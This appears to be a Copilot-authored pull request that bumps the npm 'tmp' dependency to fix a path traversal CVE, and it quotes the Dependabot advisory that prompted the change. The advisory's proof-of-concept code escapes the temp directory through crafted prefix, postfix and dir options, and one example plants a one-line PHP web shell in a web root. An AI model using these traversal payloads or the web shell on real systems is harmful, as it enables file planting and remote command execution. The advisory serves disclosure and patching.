fix(ClientSPA): bump tmp override to ^0.2.7 (CVE-2026-44705 / GHSA-ph9p-34f9-6g65)

[Copilot]

tmp@0.2.5 has a path traversal vulnerability (CVE-2026-44705) where unsanitized prefix, postfix, or dir options allow file creation outside the intended temp directory.

Changes

• package.json — advances the overrides["external-editor"]["tmp"] pin from ^0.2.5 → ^0.2.7
• package-lock.json — regenerated; tmp now resolves to 0.2.7

tmp is a transitive dep of external-editor and is not called anywhere in application code, so there is no active exploit surface — this update clears the scanner alert.

Original prompt

---

This section details the Dependabot vulnerability alert you should resolve

<alert_title>tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape</alert_title>
<alert_description>### Summary

The tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization.

Details

Root Cause:
The vulnerability exists in tmp's path construction logic where user-supplied options are directly concatenated into file paths without sanitization or validation.

Technical Flow:

1. Filename Construction: tmp builds filenames as <prefix>-<pid>-<random>-<postfix>
2. Path Composition: Final path computed as path.join(tmpDir, opts.dir, name)
3. Path Normalization: Node.js path.join() normalizes traversal sequences, allowing escape
4. File Creation: File created at the resulting (potentially escaped) path

Vulnerable Pattern:

// In tmp package internals
const name = `${opts.prefix || ''}-${process.pid}-${randomString}-${opts.postfix || ''}`;
const finalPath = path.join(tmpDir, opts.dir || '', name);
// No validation that finalPath remains within tmpDir

Path Traversal Mechanics:

• prefix/postfix traversal: ../../../evil in prefix escapes directory structure
• Absolute path bypass: If opts.dir is absolute, path.join() ignores tmpDir completely
• Normalization exploitation: path.join() resolves ../ sequences regardless of surrounding text
• Cross-platform impact: Works on Windows (..\\), Unix (../), and mixed path systems

Key Vulnerability Points:

• No input validation on prefix, postfix, or dir parameters
• Direct use of user input in path construction
• Reliance on path.join() normalization without containment checks
• Missing post-construction validation that final path remains within intended directory

PoC

Basic Path Traversal via prefix:

const tmp = require('tmp');
const path = require('path');
const fs = require('fs');

// Create a controlled base directory
const baseDir = fs.mkdtempSync('/tmp/safe-base-');
console.log('Base directory:', baseDir);

// Escape via prefix
tmp.file({ 
  tmpdir: baseDir, 
  prefix: '../escaped' 
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Created file:', filepath);
  console.log('Relative to base:', path.relative(baseDir, filepath));
  // Output shows: ../escaped-<pid>-<random>
  
  cleanup();
});

Directory Escape via postfix:

tmp.file({ 
  tmpdir: baseDir, 
  postfix: '/../../pwned.txt' 
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Escaped file:', filepath);
  console.log('Escaped outside base:', !filepath.startsWith(baseDir));
  
  cleanup();
});

Absolute Path Bypass via dir:

tmp.file({ 
  tmpdir: '/safe/tmp/dir', 
  dir: '/tmp/evil-location',
  prefix: 'bypassed'
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Bypassed to:', filepath);
  // File created in /tmp/evil-location instead of /safe/tmp/dir
  
  cleanup();
});

Advanced Multi-Vector Attack:

const maliciousOpts = {
  tmpdir: '/app/safe-tmp',
  dir: '../../../tmp',           // Escape base
  prefix: '../sensitive-area/',   // Further traversal
  postfix: 'malicious.config'     // Controlled filename
};

tmp.file(maliciousOpts, (err, filepath, fd, cleanup) => {
  // Results in file creation at: /tmp/sensitive-area/malicious.config
  console.log('Final malicious path:', filepath);
  cleanup();
});

Real-World Attack Simulation:

// Simulate web API that accepts user file prefix
function createUserTempFile(userPrefix, content) {
  return new Promise((resolve, reject) => {
    tmp.file({ prefix: userPrefix }, (err, path, fd, cleanup) => {
      if (err) return reject(err);
      
      fs.writeSync(fd, content);
      console.log('User file created at:', path);
      resolve({ path, cleanup });
    });
  });
}

// Attacker input
const attackerPrefix = '../../../var/www/html/backdoor';
createUserTempFile(attackerPrefix, '<?php system($_GET["cmd"]); ?>');
// Creates PHP backdoor in web root instead of temp directory

Impact

Arbitrary File Creation:

• Files created outside intended temporary directories
• Attacker control over file placement location
• Potential to overwrite existing files (depending on creation flags)
• Cross-platform exploitation capability

**Attack Scenarios:...

• Resolves Azure/azure-sdk-tools alert Run cred scan and link checker in parallel with other steps in aggregate-report #1423

[Copilot]

Pull request overview

Updates the APIView ClientSPA npm dependency resolution to address the tmp path traversal vulnerability (CVE-2026-44705 / GHSA-ph9p-34f9-6g65) by forcing a patched tmp version via npm overrides and regenerating the lockfile to reflect the resolved version.

Changes:

• Bumped the overrides.external-editor.tmp constraint to a patched tmp version range.
• Regenerated package-lock.json so tmp resolves to 0.2.7.

Reviewed changes

Copilot reviewed 1 out of 2 changed files in this pull request and generated 1 comment.

File	Description
src/dotnet/APIView/ClientSPA/package.json	Updates the npm override for external-editor’s transitive tmp dependency.
src/dotnet/APIView/ClientSPA/package-lock.json	Reflects the updated resolution to tmp@0.2.7 after lockfile regeneration.

Files not reviewed (1)

• src/dotnet/APIView/ClientSPA/package-lock.json: Language not supported